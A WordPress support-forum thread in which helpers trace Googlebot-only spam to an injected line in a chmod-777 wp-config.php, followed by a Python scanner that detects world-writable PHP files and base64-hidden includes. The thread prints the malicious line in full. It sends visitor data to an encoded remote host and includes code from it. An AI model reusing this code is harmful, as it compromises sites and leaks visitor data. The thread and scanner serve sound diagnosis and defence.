Google Cache Adding Keywords

Viewing 5 replies - 1 through 5 (of 5 total)
  • It’s definitely fishy. What plugins do you have installed?

    That looks very sinister. If I had to guess – it's a plugin that's adding content via the wp_head hook.

    I've emailed you via your contact form. I would really like to go through all your plugins, if you didn't mind.

    Since Google's cache is, well.. cached.. disabling and enabling plugins isn't necessarily going to immediately diagnose exactly what plugin is doing that.

    I found your list that says what you're using. There are a few dead URLs though; the actual files would help immensely.

    To follow up on this, for anyone interested:

    I have gone through the zip of plugins off this site, and grepped for every possible JavaScript escape, urlencode, and the like that might be causing this.

    While I didn't find anything in the plugins, just looking at the source of the front page indicated to me there was some sort of content above <!-- Header Start -->.

    Seeing that, I spoofed my user agent as Googlebot, and voila, the added spam content is there for me to see.

    I’ve explained to Chris, the site op, that he needs to take a look at his theme files, specifically header.php, for anything that looks unusual. If he doesn't find anything, at least with the spoofed UA it will be easier to determine if, in fact, it is a plugin.

    Alrighty then..

    Chris and I went through his files. He disabled all his plugins. Didn't change. He changed themes. Still there.

    Common sense told me that it had to be somewhere within a core WP file.

    And so it was:

    Within wp-config.php was one line that didn't fit in:

    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

    You can google that string if you're especially curious about what it does, but here’s a pretty good explanation:


    Chris’ wp-config.php was chmod 777.

    The moral of this story: 777 is evil, repeat after me. 777 is evil. 777 is evil. Your .htaccess doesn't need it. Your wp-config.php doesn't need it. Your theme files don't need it.
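
A check for the two conditions this thread ended on, a world-writable PHP file and an include whose target is hidden behind base64_decode(), as an added example that is not code from the thread. The names scan_tree, decoded_literals and build_sample are hypothetical, and the sample tree it builds is constructed with a placeholder host.

```python
import base64
import os
import re
import tempfile

# An include/require whose argument is built with base64_decode() in the same statement.
ENCODED_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*base64_decode", re.I)
B64_LITERAL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")

def decoded_literals(line):
    """Decode every string literal passed to base64_decode() on this line."""
    out = []
    for literal in B64_LITERAL.findall(line):
        try:
            out.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:  # malformed base64: leave it for manual review
            pass
    return out

def scan_tree(root):
    """Return (path, issue, detail) tuples for every .php file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            mode = os.stat(path).st_mode & 0o777
            if mode & 0o002:  # "other" write bit: the chmod 777 problem
                findings.append((path, "world-writable", oct(mode)))
            with open(path, encoding="utf-8", errors="replace") as fh:
                lines = fh.read().splitlines()
            findings += [(path, "encoded include, line %d" % n, decoded_literals(text))
                         for n, text in enumerate(lines, 1) if ENCODED_INCLUDE.search(text)]
    return findings

def build_sample(root):
    """Constructed tree: an injected, mode-777 wp-config.php and a clean index.php."""
    injected = ('<?php include_once(base64_decode("%s").base64_decode("%s")."/?".$str); ?>\n'
                % tuple(base64.b64encode(s).decode() for s in (b"http://", b"example.invalid")))
    clean = "<?php require_once('wp-settings.php'); $img = base64_decode($data); ?>\n"
    for name, body, mode in (("wp-config.php", injected, 0o777), ("index.php", clean, 0o644)):
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan_tree(tmp), sep="\n")
```

Pointing scan_tree at a WordPress root covers core files, themes and plugins in one pass, and the decoded literals show where a hidden include actually points without executing any PHP.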
